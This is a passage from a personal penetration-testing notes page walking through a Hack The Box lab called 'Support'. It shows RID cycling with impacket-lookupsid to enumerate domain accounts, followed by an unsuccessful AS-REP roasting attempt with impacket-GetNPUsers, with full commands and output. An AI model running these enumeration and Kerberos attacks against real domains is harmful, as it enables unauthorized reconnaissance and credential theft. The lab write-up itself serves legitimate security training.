InfoSec LAB

Support_RID_Cycling

Created: 3 min read

RID Cycling

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-lookupsid support.htb/blahblah@dc.support.htb 100000 
Impacket v0.11.0 - Copyright 2023 Fortra
 
password:
[*] Brute forcing SIDs at dc.support.htb
[*] stringbinding ncacn_np:dc.support.htb[\pipe\lsarpc]
[*] domain sid is: S-1-5-21-1677581083-3380853377-188903654
498: SUPPORT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SUPPORT\Administrator (SidTypeUser)
501: SUPPORT\Guest (SidTypeUser)
502: SUPPORT\krbtgt (SidTypeUser)
512: SUPPORT\Domain Admins (SidTypeGroup)
513: SUPPORT\Domain Users (SidTypeGroup)
514: SUPPORT\Domain Guests (SidTypeGroup)
515: SUPPORT\Domain Computers (SidTypeGroup)
516: SUPPORT\Domain Controllers (SidTypeGroup)
517: SUPPORT\Cert Publishers (SidTypeAlias)
518: SUPPORT\Schema Admins (SidTypeGroup)
519: SUPPORT\Enterprise Admins (SidTypeGroup)
520: SUPPORT\Group Policy Creator Owners (SidTypeGroup)
521: SUPPORT\Read-only Domain Controllers (SidTypeGroup)
522: SUPPORT\Cloneable Domain Controllers (SidTypeGroup)
525: SUPPORT\Protected Users (SidTypeGroup)
526: SUPPORT\Key Admins (SidTypeGroup)
527: SUPPORT\Enterprise Key Admins (SidTypeGroup)
553: SUPPORT\RAS and IAS Servers (SidTypeAlias)
571: SUPPORT\Allowed RODC Password Replication Group (SidTypeAlias)
572: SUPPORT\Denied RODC Password Replication Group (SidTypeAlias)
1000: SUPPORT\DC$ (SidTypeUser)
1101: SUPPORT\DnsAdmins (SidTypeAlias)
1102: SUPPORT\DnsUpdateProxy (SidTypeGroup)
1103: SUPPORT\Shared Support Accounts (SidTypeGroup)
1104: SUPPORT\ldap (SidTypeUser)
1105: SUPPORT\support (SidTypeUser)
1106: SUPPORT\smith.rosario (SidTypeUser)
1107: SUPPORT\hernandez.stanley (SidTypeUser)
1108: SUPPORT\wilson.shelby (SidTypeUser)
1109: SUPPORT\anderson.damian (SidTypeUser)
1110: SUPPORT\thomas.raphael (SidTypeUser)
1111: SUPPORT\levine.leopoldo (SidTypeUser)
1112: SUPPORT\raven.clifton (SidTypeUser)
1113: SUPPORT\bardot.mary (SidTypeUser)
1114: SUPPORT\cromwell.gerard (SidTypeUser)
1115: SUPPORT\monroe.david (SidTypeUser)
1116: SUPPORT\west.laura (SidTypeUser)
1117: SUPPORT\langley.lucy (SidTypeUser)
1118: SUPPORT\daughtler.mabel (SidTypeUser)
1119: SUPPORT\stoll.rachelle (SidTypeUser)
1120: SUPPORT\ford.victoria (SidTypeUser)
2601: SUPPORT\MANAGEMENT$ (SidTypeUser)

performing the rid cycling attack with an arbitrary credential against the target SMB service; blahblah Found the following domain users;

  • Administrator
  • Guest
  • krbtgt
  • DC$
  • MANAGEMENT$
  • ldap
  • support
  • smith.rosario
  • hernandez.stanley
  • wilson.shelby
  • anderson.damian
  • thomas.raphael
  • levine.leopoldo
  • raven.clifton
  • bardot.mary
  • cromwell.gerard
  • monroe.david
  • west.laura
  • langley.lucy
  • daughtler.mabel
  • stoll.rachelle
  • ford.victoria

The progression made by finding the domain users above will help proceeding forward, it is also important to note that those usernames gives out an impression that the target domain uses the following naming convention; <LASTNAME>.<FIRSTNAME>

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ wc -l users.txt 
22 users.txt

I have saved those domain users to a file; users.txt

Moreover, while learning the naming convention could be leveraged to further in order to continue to enumerate the domain users (if any left), I will work with those users for now since the amount is rather sufficient

ASREPRoasting Fail

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-GetNPUsers support.htb/ -dc-ip $IP -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MANAGEMENT$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User support doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smith.rosario doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hernandez.stanley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wilson.shelby doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User anderson.damian doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User thomas.raphael doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User levine.leopoldo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User raven.clifton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bardot.mary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User cromwell.gerard doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User monroe.david doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User west.laura doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User langley.lucy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User daughtler.mabel doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stoll.rachelle doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ford.victoria doesn't have UF_DONT_REQUIRE_PREAUTH set

None of the found users have DONT_REQ_PREAUTH set I will need to look elsewhere to move forward

Interactive Graph View

Backlinks